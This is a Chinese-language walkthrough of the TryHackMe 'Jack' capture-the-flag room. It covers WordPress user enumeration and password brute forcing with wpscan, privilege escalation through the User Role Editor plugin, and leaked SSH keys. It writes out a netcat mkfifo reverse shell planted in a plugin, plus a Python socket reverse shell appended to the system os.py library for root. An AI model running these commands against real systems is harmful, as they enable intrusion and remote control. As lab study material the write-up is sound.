THM打靶日寄28-Jack

• 扫描打点

  

  

  没扫到什么有价值的

  • 80

    扫出来有 /admin ，看一下是 wp 的站：

    

    wpscan --url http://jack.thm -e u

    扫出来三个人 jack wendy danny

    再爆破一下：

    wpscan --url http://jack.thm/wp-login.php -U user.txt  -P /usr/share/wordlists/fasttrack.txt

    令人感慨的是 rockyou.txt 里面没有这个密码

    爆出来账密 wendy:changelater

• wordpress 拿 rce

  进去后右下角看到版本 5.3.2

  但这个内核没洞，看提示说的是 ure_other_roles ，查了一下 ure 是 wp 的插件 User Role Editor，有一个用户提权的洞

  根据描述是去 profile.php 点 upadte profile ，在 POST 请求里面加上 ure_other_roles 参数，值为 administrator

  看到提到 admin 了：

  

  看到可以修改插件内容，在 plugin editor 里面随便改一个反弹 shell

  

  mkfifo /tmp/f;nc 10.0.127.37 4444 < /tmp/f | /bin/bash > /tmp/f

• var/backup 备份横向

  在 jack 的家目录找到第一个 flag ，以及提示：

  

  那就是去 /var/backup 找备份文件，看到 id_rsa 下下来登录：

  

  横向到 jack ，但没有密码执行不了 sudo

• 提权

  看了一圈没什么，传个 pspy 扫一下

  扫到

  

  然后不让用路径劫持了：

  

  偷看一下，发现这里可以更改 os.py 。。。

  在 /usr/lib/python2.7/os.py

  手动加一段反弹 shell 即可

  echo 'import socket
  import pty
  s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  s.connect(("10.10.127.37",8888))
  dup2(s.fileno(),0)
  dup2(s.fileno(),1)
  dup2(s.fileno(),2)
  pty.spawn("/bin/bash")'>>os.py